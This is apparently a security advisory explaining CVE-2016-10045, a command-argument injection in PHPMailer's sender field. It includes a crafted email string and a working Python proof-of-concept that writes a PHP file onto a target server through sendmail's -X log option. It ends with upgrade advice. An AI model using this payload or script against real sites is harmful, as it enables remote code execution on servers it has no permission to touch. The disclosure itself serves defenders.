CVE-2016-10045[1] is a critical vulnerability in PHPMailer[2], a widely used library for sending emails in PHP[3] web applications, affecting versions prior to 5.2.18. This vulnerability allows attackers to execute malicious code on a compromised web server by exploiting an input validation flaw in the PHPMailer code.

This publication is also available in: Portuguese

Intro

PHPMailer remains one of the most widely used email-sending libraries, with approximately 9 million users worldwide. Additionally, it is also used in numerous open-source projects such as WordPress, Drupal, and Joomla.

This vulnerability is particularly critical because, in most cases, the attacker does not need to be an authenticated user to inject malicious code and perform a remote code execution (RCE)[4] on a web server.

To exploit this vulnerability, an attacker simply needs to identify a form field that uses PHPMailer for email sending and submit the payload.

Description

This vulnerability stems from an inadequate fix for CVE-2016-10033[5]. In PHPMailer version 5.2.17, the $Sender variable is sanitized using the escapeshellarg() function before being passed to the mail() function. However, an attacker can add an extra single quotation mark that isn’t properly escaped, breaking the intended flow of escapeshellarg().

Example:

$mail \-\> SetFrom("\\"Attacker\\\\' \-Param2 \-Param3\\"@test.com", 'Client Name');

The above will result in the following list of arguments being passed to the email-sending application:

Arg no. 0 \== \[/usr/sbin/sendmail\]  
Arg no. 1 \== \[-t\]  
Arg no. 2 \== \[-i\]  
Arg no. 3 \== \[-f\\"Attacker\\\\\\\]  
Arg no. 4 \== \[-Param2\]  
Arg no. 5 \== \[-Param3"@test.com'\]

The attacker can pass the -X parameter to create a log containing arbitrary PHP code, making versions prior to 5.2.20 vulnerable to remote code execution (RCE).

Proof of Concept

Python script to exploit the vulnerability:

#!/usr/bin/env python3  
import requests  
import argparse  
import re  
def exploit(url, dir):  
    if not re.match(r'^https?://', url):  
        url \= f"https://{url}"  
    payload \= "\\"attacker\\\\' \-oQ/tmp/ \-X%s/phpcode.php  some\\"@email.com" % dir  
    code \= "\<?php phpinfo(); ?\>"  
      
    data \= {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': code}  
      
    response \= requests.post(url, data=data)  
      
    if response.status\_code \== 200:  
        print("Exploitation successful\!")  
    else:  
        print("Exploitation failed.")  
def main():  
    parser \= argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer')  
    parser.add\_argument('-t', '--target', required=True, help='Target URL')  
    parser.add\_argument('-d', '--dir', required=True, help='Remote recording directory')  
    args \= parser.parse\_args()  
      
    if args.target and args.dir:  
        exploit(args.target, args.dir)  
if \_\_name\_\_ \== '\_\_main\_\_':  
    main()

Conclusion

The vulnerability arises from a failure of improper input sanitization input in PHPMailer, allowing attackers to execute malicious code on compromised web servers. This poses a significant risk, as exploitation can be carried out without requiring authentication, allowing for remote code injection (RCE) in vulnerable applications.

The potential impact of a successful exploitation includes the execution of arbitrary code, which potentially leads to security breaches and unauthorized access to sensitive information.

The recommended mitigation is to update PHPMailer to version 5.2.20 or higher.

References

• [1] MITRE - CVE-2016-10045
• [2] GitHub - PHPMailer: A full-featured email creation and transfer class for PHP
• [3] PHP - A popular general-purpose scripting language
• [4] Cloudflare - What is remote code execution?
• [5] MITRE - CVE-2016-10033